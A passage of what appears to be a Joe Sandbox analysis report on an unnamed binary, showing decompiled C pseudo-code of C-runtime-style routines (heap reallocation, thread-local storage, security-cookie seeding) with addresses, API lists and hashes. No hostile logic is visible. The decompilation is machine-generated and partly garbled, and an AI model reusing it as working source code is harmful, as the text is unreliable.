                                                                    							}
                                                                    							__eflags = GetFileType(_t69);
                                                                    							if(__eflags == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							goto L23;
                                                                    							L25:
                                                                    							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                    							_t82 = _t82 + 1;
                                                                    							_t109 = _t109 + 1;
                                                                    							__eflags = _t82 - _t101;
                                                                    						} while (_t82 < _t101);
                                                                    						goto L26;
                                                                    					} else {
                                                                    						_t106 = 0x44b144;
                                                                    						while(1) {
                                                                    							_t78 = E00422EEB(0x480);
                                                                    							__eflags = _t78;
                                                                    							if(_t78 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							 *0x44b120 =  *0x44b120 + 0x20;
                                                                    							 *_t106 = _t78;
                                                                    							_t12 =  &(_t78[0x120]); // 0x480
                                                                    							_t96 = _t12;
                                                                    							while(1) {
                                                                    								__eflags = _t78 - _t96;
                                                                    								if(_t78 >= _t96) {
                                                                    									break;
                                                                    								}
                                                                    								 *_t78 =  *_t78 | 0xffffffff;
                                                                    								_t78[2] = _t78[2] & 0x00000000;
                                                                    								_t78[1] = 0;
                                                                    								_t78[1] = 0xa;
                                                                    								_t78 =  &(_t78[9]);
                                                                    								_t96 =  &(( *_t106)[0x120]);
                                                                    								__eflags = _t96;
                                                                    							}
                                                                    							_t106 =  &(_t106[1]);
                                                                    							__eflags =  *0x44b120 - _t101; // 0x20
                                                                    							if(__eflags < 0) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L18;
                                                                    						}
                                                                    						_t101 =  *0x44b120; // 0x20
                                                                    						goto L18;
                                                                    					}
                                                                    				}
                                                                    				return _t51 | 0xffffffff;
                                                                    			}



























                                                                    0x004271a6
                                                                    0x004271ae
                                                                    0x004271b8
                                                                    0x004271bd
                                                                    0x004271c7
                                                                    0x004271c7
                                                                    0x004271ed
                                                                    0x004271ed
                                                                    0x004271ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004271cf
                                                                    0x004271d2
                                                                    0x004271d6
                                                                    0x004271da
                                                                    0x004271de
                                                                    0x004271e4
                                                                    0x004271e7
                                                                    0x004271e7
                                                                    0x004271e7
                                                                    0x004271f9
                                                                    0x004271ff
                                                                    0x00427205
                                                                    0x004272f4
                                                                    0x004272f4
                                                                    0x004272f4
                                                                    0x004272f6
                                                                    0x004272f6
                                                                    0x004272ff
                                                                    0x00427302
                                                                    0x00427305
                                                                    0x00427376
                                                                    0x00427376
                                                                    0x00427376
                                                                    0x00000000
                                                                    0x00427376
                                                                    0x00427307
                                                                    0x00427309
                                                                    0x0042730d
                                                                    0x0042731e
                                                                    0x00427320
                                                                    0x00427320
                                                                    0x0042730f
                                                                    0x00427311
                                                                    0x00427311
                                                                    0x0042732a
                                                                    0x0042732c
                                                                    0x0042732f
                                                                    0x00427370
                                                                    0x00427370
                                                                    0x00427331
                                                                    0x00427332
                                                                    0x00427338
                                                                    0x0042733a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042733c
                                                                    0x00427341
                                                                    0x00427344
                                                                    0x00427346
                                                                    0x0042734e
                                                                    0x00427351
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427348
                                                                    0x00427348
                                                                    0x00427348
                                                                    0x00427357
                                                                    0x0042735a
                                                                    0x00427360
                                                                    0x00427365
                                                                    0x00427369
                                                                    0x00427314
                                                                    0x00427314
                                                                    0x00427392
                                                                    0x00000000
                                                                    0x0042736b
                                                                    0x0042736b
                                                                    0x00000000
                                                                    0x0042736b
                                                                    0x00427369
                                                                    0x0042737a
                                                                    0x0042737a
                                                                    0x0042737b
                                                                    0x0042737b
                                                                    0x0042738a
                                                                    0x00427390
                                                                    0x00427390
                                                                    0x00000000
                                                                    0x00427390
                                                                    0x0042720b
                                                                    0x0042720f
                                                                    0x00427211
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427217
                                                                    0x00427219
                                                                    0x0042721f
                                                                    0x00427228
                                                                    0x0042722a
                                                                    0x0042722c
                                                                    0x0042722c
                                                                    0x0042722e
                                                                    0x00427234
                                                                    0x00427284
                                                                    0x00427284
                                                                    0x00427286
                                                                    0x00427288
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042728a
                                                                    0x0042728a
                                                                    0x0042728e
                                                                    0x00427290
                                                                    0x00427293
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427295
                                                                    0x00427298
                                                                    0x0042729b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042729d
                                                                    0x004272a0
                                                                    0x004272ad
                                                                    0x004272c1
                                                                    0x004272ca
                                                                    0x004272cf
                                                                    0x004272d2
                                                                    0x004272d5
                                                                    0x004272db
                                                                    0x004272e0
                                                                    0x004272e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004272e6
                                                                    0x004272e6
                                                                    0x004272e6
                                                                    0x00000000
                                                                    0x004272e6
                                                                    0x004272a9
                                                                    0x004272ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004272e9
                                                                    0x004272e9
                                                                    0x004272ee
                                                                    0x004272ef
                                                                    0x004272f0
                                                                    0x004272f0
                                                                    0x00000000
                                                                    0x00427236
                                                                    0x00427236
                                                                    0x0042723b
                                                                    0x0042723c
                                                                    0x00427241
                                                                    0x00427244
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427246
                                                                    0x0042724d
                                                                    0x0042724f
                                                                    0x0042724f
                                                                    0x0042726d
                                                                    0x0042726d
                                                                    0x0042726f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427257
                                                                    0x0042725a
                                                                    0x0042725e
                                                                    0x00427262
                                                                    0x00427268
                                                                    0x0042726b
                                                                    0x0042726b
                                                                    0x0042726b
                                                                    0x00427271
                                                                    0x00427274
                                                                    0x0042727a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042727c
                                                                    0x0042727e
                                                                    0x00000000
                                                                    0x0042727e
                                                                    0x00427234
                                                                    0x00000000

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 004271F9
                                                                    • GetFileType.KERNEL32(?), ref: 004272A3
                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 00427324
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleInfoStartupType
                                                                    • String ID:
                                                                    • API String ID: 2461013171-0
                                                                    • Opcode ID: a6857e4607a195e0e5682d2243a2fadf662c40425cd609d80db00953e4e459e1
                                                                    • Instruction ID: a6a67d0374b2e9e0c6ded3a7aed6c943089740e477cfed26efa39e09722bcd27
                                                                    • Opcode Fuzzy Hash: a6857e4607a195e0e5682d2243a2fadf662c40425cd609d80db00953e4e459e1
                                                                    • Instruction Fuzzy Hash: 4B51D3313083528FC724CF69E89872677E4FB01324F684AAEE9A6C72E1D738D405D759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E004251E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				long _t30;
                                                                    				long _t31;
                                                                    				long _t33;
                                                                    				void* _t36;
                                                                    				long _t38;
                                                                    				long _t41;
                                                                    				long _t42;
                                                                    				long _t44;
                                                                    				long _t46;
                                                                    				void* _t59;
                                                                    				long _t61;
                                                                    				void* _t67;
                                                                    				void* _t68;
                                                                    
                                                                    				_push(0x14);
                                                                    				_push(0x430630);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t59 =  *(_t67 + 8);
                                                                    				if(_t59 != 0) {
                                                                    					_t61 =  *(_t67 + 0xc);
                                                                    					__eflags = _t61;
                                                                    					if(__eflags != 0) {
                                                                    						__eflags =  *0x44c298 - 3;
                                                                    						if( *0x44c298 != 3) {
                                                                    							while(1) {
                                                                    								_t28 = 0;
                                                                    								__eflags = _t61 - 0xffffffe0;
                                                                    								if(_t61 <= 0xffffffe0) {
                                                                    									__eflags = _t61;
                                                                    									if(_t61 == 0) {
                                                                    										_t61 = 1;
                                                                    										__eflags = 1;
                                                                    									}
                                                                    									_t28 = RtlReAllocateHeap( *0x44c294, 0, _t59, _t61);
                                                                    								}
                                                                    								__eflags = _t28;
                                                                    								if(_t28 != 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								__eflags =  *0x4483cc; // 0x0
                                                                    								if(__eflags == 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								_t30 = E00422EFD(_t61);
                                                                    								__eflags = _t30;
                                                                    								if(_t30 != 0) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L36;
                                                                    							}
                                                                    							goto L37;
                                                                    						} else {
                                                                    							goto L5;
                                                                    						}
                                                                    						do {
                                                                    							L5:
                                                                    							 *(_t67 - 0x1c) = 0;
                                                                    							__eflags = _t61 - 0xffffffe0;
                                                                    							if(_t61 > 0xffffffe0) {
                                                                    								L25:
                                                                    								_t28 =  *(_t67 - 0x1c);
                                                                    								__eflags =  *(_t67 - 0x1c);
                                                                    								if( *(_t67 - 0x1c) != 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								__eflags =  *0x4483cc; // 0x0
                                                                    								if(__eflags == 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								goto L27;
                                                                    							}
                                                                    							E004241FB(0, _t59, 4);
                                                                    							 *(_t67 - 4) = 0;
                                                                    							_t33 = E0042470E(_t59);
                                                                    							 *(_t67 - 0x20) = _t33;
                                                                    							__eflags = _t33;
                                                                    							if(_t33 == 0) {
                                                                    								L21:
                                                                    								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                    								E00425351();
                                                                    								__eflags =  *(_t67 - 0x20);
                                                                    								if( *(_t67 - 0x20) == 0) {
                                                                    									__eflags = _t61;
                                                                    									if(_t61 == 0) {
                                                                    										_t61 = 1;
                                                                    										__eflags = 1;
                                                                    									}
                                                                    									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                    									__eflags = _t61;
                                                                    									 *(_t67 + 0xc) = _t61;
                                                                    									 *(_t67 - 0x1c) = RtlReAllocateHeap( *0x44c294, 0, _t59, _t61);
                                                                    								}
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = _t61 -  *0x44c284;
                                                                    							if(_t61 <=  *0x44c284) {
                                                                    								_push(_t61);
                                                                    								_push(_t59);
                                                                    								_push(_t33);
                                                                    								_t41 = E00424C0E();
                                                                    								_t68 = _t68 + 0xc;
                                                                    								__eflags = _t41;
                                                                    								if(_t41 == 0) {
                                                                    									_push(_t61);
                                                                    									_t42 = E00424EED();
                                                                    									 *(_t67 - 0x1c) = _t42;
                                                                    									__eflags = _t42;
                                                                    									if(_t42 != 0) {
                                                                    										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                    										 *(_t67 - 0x24) = _t44;
                                                                    										__eflags = _t44 - _t61;
                                                                    										if(_t44 >= _t61) {
                                                                    											_t44 = _t61;
                                                                    										}
                                                                    										E00422FB0( *(_t67 - 0x1c), _t59, _t44);
                                                                    										_t46 = E0042470E(_t59);
                                                                    										 *(_t67 - 0x20) = _t46;
                                                                    										_push(_t59);
                                                                    										_push(_t46);
                                                                    										E00424739();
                                                                    										_t68 = _t68 + 0x18;
                                                                    									}
                                                                    								} else {
                                                                    									 *(_t67 - 0x1c) = _t59;
                                                                    								}
                                                                    							}
                                                                    							__eflags =  *(_t67 - 0x1c);
                                                                    							if( *(_t67 - 0x1c) == 0) {
                                                                    								__eflags = _t61;
                                                                    								if(_t61 == 0) {
                                                                    									_t61 = 1;
                                                                    									__eflags = 1;
                                                                    									 *(_t67 + 0xc) = 1;
                                                                    								}
                                                                    								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                    								 *(_t67 + 0xc) = _t61;
                                                                    								_t36 = RtlAllocateHeap( *0x44c294, 0, _t61);
                                                                    								 *(_t67 - 0x1c) = _t36;
                                                                    								__eflags = _t36;
                                                                    								if(_t36 != 0) {
                                                                    									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                    									 *(_t67 - 0x24) = _t38;
                                                                    									__eflags = _t38 - _t61;
                                                                    									if(_t38 >= _t61) {
                                                                    										_t38 = _t61;
                                                                    									}
                                                                    									E00422FB0( *(_t67 - 0x1c), _t59, _t38);
                                                                    									_push(_t59);
                                                                    									_push( *(_t67 - 0x20));
                                                                    									E00424739();
                                                                    									_t68 = _t68 + 0x14;
                                                                    								}
                                                                    							}
                                                                    							goto L21;
                                                                    							L27:
                                                                    							_t31 = E00422EFD(_t61);
                                                                    							__eflags = _t31;
                                                                    						} while (_t31 != 0);
                                                                    						goto L36;
                                                                    					} else {
                                                                    						_push(_t59);
                                                                    						E0042275E(0, _t59, _t61, __eflags);
                                                                    						L36:
                                                                    						_t28 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L37;
                                                                    					}
                                                                    				} else {
                                                                    					_t28 = E00422EEB( *(_t67 + 0xc));
                                                                    					L37:
                                                                    					return E00424267(_t28);
                                                                    				}
                                                                    			}
















                                                                    0x004251e9
                                                                    0x004251eb
                                                                    0x004251f0
                                                                    0x004251f5
                                                                    0x004251fc
                                                                    0x0042520c
                                                                    0x0042520f
                                                                    0x00425211
                                                                    0x0042521f
                                                                    0x00425226
                                                                    0x0042535a
                                                                    0x0042535a
                                                                    0x0042535c
                                                                    0x0042535f
                                                                    0x00425361
                                                                    0x00425363
                                                                    0x00425367
                                                                    0x00425367
                                                                    0x00425367
                                                                    0x00425371
                                                                    0x00425371
                                                                    0x00425377
                                                                    0x00425379
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042537b
                                                                    0x00425381
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425384
                                                                    0x0042538a
                                                                    0x0042538c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042538c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042522c
                                                                    0x0042522c
                                                                    0x0042522c
                                                                    0x0042522f
                                                                    0x00425232
                                                                    0x00425329
                                                                    0x00425329
                                                                    0x0042532c
                                                                    0x0042532e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425330
                                                                    0x00425336
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425336
                                                                    0x0042523a
                                                                    0x00425240
                                                                    0x00425244
                                                                    0x0042524a
                                                                    0x0042524d
                                                                    0x0042524f
                                                                    0x004252f9
                                                                    0x004252f9
                                                                    0x004252fd
                                                                    0x00425302
                                                                    0x00425305
                                                                    0x00425307
                                                                    0x00425309
                                                                    0x0042530d
                                                                    0x0042530d
                                                                    0x0042530d
                                                                    0x00425311
                                                                    0x00425311
                                                                    0x00425314
                                                                    0x00425326
                                                                    0x00425326
                                                                    0x00000000
                                                                    0x00425305
                                                                    0x00425255
                                                                    0x0042525b
                                                                    0x0042525d
                                                                    0x0042525e
                                                                    0x0042525f
                                                                    0x00425260
                                                                    0x00425265
                                                                    0x00425268
                                                                    0x0042526a
                                                                    0x00425271
                                                                    0x00425272
                                                                    0x00425278
                                                                    0x0042527b
                                                                    0x0042527d
                                                                    0x00425282
                                                                    0x00425283
                                                                    0x00425286
                                                                    0x00425288
                                                                    0x0042528a
                                                                    0x0042528a
                                                                    0x00425291
                                                                    0x00425297
                                                                    0x0042529c
                                                                    0x0042529f
                                                                    0x004252a0
                                                                    0x004252a1
                                                                    0x004252a6
                                                                    0x004252a6
                                                                    0x0042526c
                                                                    0x0042526c
                                                                    0x0042526c
                                                                    0x0042526a
                                                                    0x004252a9
                                                                    0x004252ac
                                                                    0x004252ae
                                                                    0x004252b0
                                                                    0x004252b4
                                                                    0x004252b4
                                                                    0x004252b5
                                                                    0x004252b5
                                                                    0x004252bb
                                                                    0x004252be
                                                                    0x004252c9
                                                                    0x004252cf
                                                                    0x004252d2
                                                                    0x004252d4
                                                                    0x004252d9
                                                                    0x004252da
                                                                    0x004252dd
                                                                    0x004252df
                                                                    0x004252e1
                                                                    0x004252e1
                                                                    0x004252e8
                                                                    0x004252ed
                                                                    0x004252ee
                                                                    0x004252f1
                                                                    0x004252f6
                                                                    0x004252f6
                                                                    0x004252d4
                                                                    0x00000000
                                                                    0x00425338
                                                                    0x00425339
                                                                    0x0042533f
                                                                    0x0042533f
                                                                    0x00000000
                                                                    0x00425213
                                                                    0x00425213
                                                                    0x00425214
                                                                    0x0042538e
                                                                    0x0042538e
                                                                    0x0042538e
                                                                    0x00000000
                                                                    0x0042538e
                                                                    0x004251fe
                                                                    0x00425201
                                                                    0x00425390
                                                                    0x00425395
                                                                    0x00425395

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eff8c71ff45f353f7d82edac43285b86db25b333261faaf5caad8adb28c8997c
                                                                    • Instruction ID: 50c6e6ca1a471ced26daec9c1ca993849403effbbc4278b2e0fe4d56d80a6d58
                                                                    • Opcode Fuzzy Hash: eff8c71ff45f353f7d82edac43285b86db25b333261faaf5caad8adb28c8997c
                                                                    • Instruction Fuzzy Hash: A541C5B1F01935EBCF20AFA6BC848AF7A64EA45764791112FFC14A6290D77C4D41CEAC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E00423BDF() {
                                                                    				void* __ebx;
                                                                    				void* __esi;
                                                                    				long _t5;
                                                                    				long _t7;
                                                                    				long _t9;
                                                                    				long _t10;
                                                                    				void* _t14;
                                                                    				long _t15;
                                                                    
                                                                    				_t5 = GetLastError();
                                                                    				_push( *0x446f28);
                                                                    				_t10 = _t5;
                                                                    				"PHqtpHqt0Hqt"();
                                                                    				_t15 = _t5;
                                                                    				_t16 = _t15;
                                                                    				if(_t15 == 0) {
                                                                    					_push(0x8c);
                                                                    					_push(1);
                                                                    					_t7 = E00427472(_t10, _t14, _t15, _t16);
                                                                    					_t15 = _t7;
                                                                    					if(_t15 == 0) {
                                                                    						L4:
                                                                    						E00422C26(0x10);
                                                                    					} else {
                                                                    						_push(_t15);
                                                                    						_push( *0x446f28);
                                                                    						"pHqt0Hqt"();
                                                                    						if(_t7 == 0) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							 *((intOrPtr*)(_t15 + 0x54)) = 0x447678;
                                                                    							 *((intOrPtr*)(_t15 + 0x14)) = 1;
                                                                    							_t9 = GetCurrentThreadId();
                                                                    							 *(_t15 + 4) =  *(_t15 + 4) | 0xffffffff;
                                                                    							 *_t15 = _t9;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				SetLastError(_t10);
                                                                    				return _t15;
                                                                    			}











                                                                    0x00423be1
                                                                    0x00423be7
                                                                    0x00423bed
                                                                    0x00423bef
                                                                    0x00423bf5
                                                                    0x00423bf7
                                                                    0x00423bf9
                                                                    0x00423bfb
                                                                    0x00423c00
                                                                    0x00423c02
                                                                    0x00423c07
                                                                    0x00423c0d
                                                                    0x00423c3c
                                                                    0x00423c3e
                                                                    0x00423c0f
                                                                    0x00423c0f
                                                                    0x00423c10
                                                                    0x00423c16
                                                                    0x00423c1e
                                                                    0x00000000
                                                                    0x00423c20
                                                                    0x00423c20
                                                                    0x00423c27
                                                                    0x00423c2e
                                                                    0x00423c34
                                                                    0x00423c38
                                                                    0x00423c38
                                                                    0x00423c1e
                                                                    0x00423c0d
                                                                    0x00423c45
                                                                    0x00423c4f

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,0042685B,004241BD,00000000,00430490,00000008,00424214,?,?,?,00422781,00000004,00430358,0000000C,00424114), ref: 00423BE1
                                                                    • FlsGetValue.KERNEL32(?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423BEF
                                                                    • SetLastError.KERNEL32(00000000,?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423C45
                                                                      • Part of subcall function 00427472: __lock.LIBCMT ref: 004274B6
                                                                      • Part of subcall function 00427472: RtlAllocateHeap.NTDLL(00000008,?,00430B60), ref: 004274F4
                                                                    • FlsSetValue.KERNEL32(00000000,?,00422781,00000004,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 00423C16
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00423C2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                    • String ID:
                                                                    • API String ID: 1487844433-0
                                                                    • Opcode ID: c36c40087d43799878c3647ab0fb0f45bd7bed6d8916e5c34953dbc2e19d5338
                                                                    • Instruction ID: 633b9cc39e93b5ce6e34e234b303751ae9900a93f108d93fc5aa3b6252269568
                                                                    • Opcode Fuzzy Hash: c36c40087d43799878c3647ab0fb0f45bd7bed6d8916e5c34953dbc2e19d5338
                                                                    • Instruction Fuzzy Hash: 66F0C8363017219BD3342F61BD0970ABAB0EB01762B514629E591A62A1DBB88C444B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00429BEE() {
                                                                    				struct _FILETIME _v12;
                                                                    				signed int _v16;
                                                                    				union _LARGE_INTEGER _v20;
                                                                    				signed int _t7;
                                                                    				signed int _t9;
                                                                    				signed int _t10;
                                                                    				signed int _t11;
                                                                    				signed int _t15;
                                                                    				signed int _t22;
                                                                    
                                                                    				_t7 =  *0x446f24; // 0x82246c35
                                                                    				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                    					GetSystemTimeAsFileTime( &_v12);
                                                                    					_t9 = GetCurrentProcessId();
                                                                    					_t10 = GetCurrentThreadId();
                                                                    					_t11 = GetTickCount();
                                                                    					QueryPerformanceCounter( &_v20);
                                                                    					_t15 = _v16 ^ _v20.LowPart;
                                                                    					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                    					 *0x446f24 = _t22;
                                                                    					if(_t22 == 0) {
                                                                    						 *0x446f24 = 0xbb40e64e;
                                                                    					}
                                                                    					return _t15;
                                                                    				}
                                                                    				return _t7;
                                                                    			}












                                                                    0x00429bf4
                                                                    0x00429bfb
                                                                    0x00429c09
                                                                    0x00429c15
                                                                    0x00429c1d
                                                                    0x00429c25
                                                                    0x00429c31
                                                                    0x00429c3a
                                                                    0x00429c3d
                                                                    0x00429c3f
                                                                    0x00429c45
                                                                    0x00429c47
                                                                    0x00429c47
                                                                    0x00000000
                                                                    0x00429c51
                                                                    0x00429c53

                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00429C09
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00429C15
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00429C1D
                                                                    • GetTickCount.KERNEL32 ref: 00429C25
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00429C31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: fb65a2dc32d3fd81b4879bdf6826c35e285d0c3fa8f5780a6870f9eba52af9f3
                                                                    • Instruction ID: cf895ea1c6de8500e18015c1e7b66bb1a140f48cb24875eab0e156f085952eee
                                                                    • Opcode Fuzzy Hash: fb65a2dc32d3fd81b4879bdf6826c35e285d0c3fa8f5780a6870f9eba52af9f3
                                                                    • Instruction Fuzzy Hash: C9F09776D002249BCF209FB5F94859ABBF8BB0D344B820665D855E7214EA35A9048B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E00421B39(void* __eflags) {
                                                                    				void* _t30;
                                                                    				void* _t32;
                                                                    				intOrPtr* _t36;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    				void* _t40;
                                                                    				void* _t44;
                                                                    
                                                                    				_t44 = __eflags;
                                                                    				E004232F0(E0042FE7A, _t40);
                                                                    				_t1 = _t40 - 0x28; // 0xb4
                                                                    				E00402A60(_t1, "invalid string position");
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                    				_t4 = _t40 - 0x28; // 0xb4
                                                                    				_t5 = _t40 - 0x50; // 0x8c
                                                                    				E004029A0(_t5, _t44, _t4);
                                                                    				_t6 = _t40 - 0x50; // 0x8c
                                                                    				 *((intOrPtr*)(_t40 - 0x50)) = 0x4302b4;
                                                                    				E0042246E(_t6, 0x4326d4);
                                                                    				asm("int3");
                                                                    				E004232F0(E0042FE7A, _t40);
                                                                    				_t8 = _t40 - 0x28; // 0xb4
                                                                    				E00402A60(_t8, "string too long");
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                    				_t11 = _t40 - 0x28; // 0xb4
                                                                    				_t12 = _t40 - 0x50; // 0x8c
                                                                    				_t36 = _t12;
                                                                    				E004029A0(_t36, _t44, _t11);
                                                                    				_t13 = _t40 - 0x50; // 0xb4
                                                                    				 *((intOrPtr*)(_t40 - 0x50)) = 0x4302a8;
                                                                    				_t30 = E0042246E(_t13, 0x432674);
                                                                    				asm("int3");
